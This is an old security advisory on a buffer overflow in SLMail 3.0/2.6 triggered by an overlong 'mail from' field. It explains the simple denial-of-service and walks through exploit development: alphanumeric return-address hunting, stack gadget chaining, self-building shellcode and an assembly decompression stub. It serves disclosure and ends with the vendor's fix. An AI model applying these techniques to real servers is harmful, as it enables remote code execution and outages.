COMMAND
Seattle Lab Sendmail
SYSTEMS AFFECTED
Win NT with SLMail 3.0.2421 and 2.6 (Win95)
PROBLEM
Jeremy Kothe found following. If the "mail from" field exceeds
256 bytes, it will pass through the receive process without being
trimmed... When the mail dispatcher picks up the mail file to
process, it copies it into a stack buffer of only 256 bytes,
overwriting the function return address and normally halting the
SLMail server. The DOS attack is simple - simply send an e-mail
with "mail from" > 256 bytes.
To exploit the attack to remotely execute code is difficult but
NOT impossible. The main difficulty is that the string which
overflows the stack (the "mail from" name) can contain only valid
email address characters. But don't think that makes it
impossible...
Stack overflows under UNIX are usually a simple affair - create a
shell and pipe it to the attacker. Under Windows 95 or Windows
NT, however, the task is a little more complex. If you are not
familiar with basic win32 stack overflow methods, see dildog's
excellent article at:
http://www.cultdeadcow
as well as his contributions at:
http://www.l0pht.com.
What about tools? Microsoft's under-rated (though limited) WinDbg
to debug and examine the fault. Borland's Turbo Assembler and
DataRescue's IDA (disassembler) for converting code into data
bytes (no, sorry, I refuse to remember that 0x50 is push eax... oh
shit). Borland Delphi - Jeremy's 3gl of choice for the Windows
environment to create and send the e-mail. Any ip-capable platform
could of course be used here.
The idea behind ANY overflow execution exploit is to leverage a
bug or crash to execute data. To do anything, we must first "snag
the EIP". To do this, we must examine the environment produced
by the initial crash, find somewhere a pointer to our data, and
then somehow get it into the eip register... So let's take a look
at the environment created when SLMail overflows.
Fire up SLMail.exe (it's a service, so use "net start slmail" or
the control panel), then start WinDbg and Attach (F6) to the
SLMail process. Press F5 to continue execution... Now we create a
test program to send a buffer of 1600-odd 0x61 ("a")'s as the
email from address. Running this program, our e-mail is accepted
and placed, as a file, into SLMail's "In" subdirectory. SLMail.exe
then picks up this file and bang... WinDbg reports our
first-chance-exception at 0x42264f.
0042263C mov ecx, [esp+114h+arg_0]
00422643 mov edx, [esp+114h+arg_4]
0042264A mov eax, [esp+114h+var_104]
0042264E pop edi
0042264F ==> exception mov [ecx], esi
00422651 mov [edx], eax
00422653 mov eax, ebp
00422655 pop esi
00422656 pop ebp
00422657 pop ebx
00422658 add esp, 104h
0042265E retn
The memory address which is being written to here happens to be
0x61616161, which we see four lines above as being the procedure's
first argument on the stack... Looking at the registers, we find
that the stack area has been well and truly overwritten by our
test data, and that several registers (esp, esi, edi) are
pointing to areas within this data area. And if we can stop the
exception at 0x42264f, and the next one at 0x422651, then the retn
will return to 0x61616161, or whatever else we choose to feed it.
To stop the crash, we need to find an address which is writable,
and place two copies of it into our buffer in the appropriate
place. This would be no real problem except for our main
limitation, the alphanumeric-only content of our buffer allows us
only 1/1024 of the address space. So we search and search...
Nothing in the main program, so one-by-one we check the dlls used.
Now, this is where the issue of platform-dependency comes along.
If we use an address in a dll, we are binding the exploit to that
version of the dll. Any other versions would crash. Luckily, the
proliferation of NT 4.0 sp3 platforms provide a number of large
dlls which are fairly constant (ie: user32.dll, kernel32.dll).
It's worth remembering that NT server and workstation binaries are
identical, so even by targeting only this one platform, an
attacker could probable achieve a > 70% success rate on a random
basis.
So eventually, it was found an address in a dll data segment which
was valid for us to use, and plugged it in. Now we're past the
crash. Returning to the stack via Microsoftware. Normally, at
this point, you could open up the main executable in IDA, turn
on showing of op-codes, then do a string search for a " 54 " (the
op-code for push esp). Ideally, what you're looking for is:
push esp
retn
Of course this would not usually be done, but by seaching for "54"
you can almost always find something like:
add esp, 54h
retn
Which is really the same thing! Just ignore the "add esp" and
voila.
Again, this is made enormously difficult because of the 1/1024
limitation. And in this case, dig as Jeremy might, Jeremy couldn't
find anything at a valid address... The closest thing Jeremy could
use were a few bits like this:
push esp (actually an add esp, 54h)
pop eax/ebx
pop edi
...
retn
Now all this does is to get esp into eax. Doesnt seem like much
until you realise thats it's relatively common to do a "call eax"
or "call ebx". So, we go and find ourselves a "call eax/ebx"
statement again with a valid (alphanumeric) address. We find a
"call ebx" which we can use, so we go back and find a variant of
the above code snippet which moves our esp into ebx. Positioning
these two addresses at the correct position in the buffer can be
tricky, but eventually we end up returning to what was originally
our stack. The first stage of the attack is over, and were it not
for the alphanumeric limitations, the battle would be over.
Now, executing text. We have control of the eip... cheer, rest,
think. What can we put in our buffer to execute? Not bloody much.
Every byte in our buffer MUST be valid alphanumeric.
Now, we wouldn't have come this far without a plan, though. Our
idea is to use what small instruction set we DO have to
dynamically CREATE a more flexible piece of code. Checking the
instructions available to us in the character set we have, we find
that we have all of the "push"es and most of the "pop"s. Along
with, luckily, the "-" character, which turns into a "sub eax,..."
So, the initial code would PUSH the program onto the stack, then
execute it from there. The first trick is to push bytes which
cannot be in our buffer, Jeremy came up with the following:
push xxxxxxxxh
pop eax
sub eax, xxxxxxxxh
...
sub eax, xxxxxxxxh
push eax
Effectively, this means that for each DWORD of the target program,
we need to calculate a series of valid DWORDs which subtract from
one-another to produce the target DWORD. Sounds tough, but it
turns out that a bit of brute force solves this one easily. Jeremy
wrote a fairly simple program () which calculated these numbers
and produced code for us to cut and paste.
After we've pushed this program onto the stack however, we need
then to jump or call to it. Unfortunately our limited instruction
set has only short jumps, which limits our range so much we'd
have to chain them. The initial location of the stack pointer, and
therefore the pushed program, is just above our current location
(where we are pushing the program ). So, instead of chaining
short upwards jumps which would be hell to position and maintain,
Jeremy inserted a series of "popad" instructions to move the stack
pointer down, over and past the push code, allowing only enough
room for the target program. The program is then pushed onto the
stack and voila, no jump or call needed. We have created the
program in front of our eip and we naturally execute into it.
Tricky, but by leaving a bit of room at the end of the "push"ing
routing filled with harmless "inc esi" instructions, it works
fine. So, by using about 6-16 bytes per DWORD, we can create and
run a program. At this rate, we would rapidly run out of room in
our buffer to do anything. So, we add another trick. The program
we produce is a small decompression routine. Using a simple nibble
to byte compression routine to encrypt our main program and place
it elsewhere in the buffer. This allows a 2 DWORD to 1 DWORD
compression ratio, and a larger main program.
The decompression routine is simple enough:
; assume edx points to source area
mov esi, esp
add esi, 122 ; source from esp...
; get length of code...
xor ecx, ecx
mov cx, word ptr [esi]
add esi, 2
sub cx, 6161h
mov bx, cx
shr cx, 4
or cl, bl
; decode code...
decode:
mov eax, [esi]
add esi, 4
sub eax, 61616161h
mov ebx, eax
shr eax, 4
or al, bl
mov ebx, eax
shr eax, 4
mov al, bl
ror eax, 0ch
shr al, 4
rol eax, 0ch
push ax
loop decode
call esp
Game over, We can run ANY code we want at this point.
SOLUTION
The fix was incorporated in beta versions of SLmail 3.1 and
SLmail 2.7. Customers who would like to receive the beta versions
should contact betaadmin@seattlelab.com. Please put the product
serial number in the subject line. Seattle Lab will post the
release versions of these programs to our download site as soon
as testing is completed.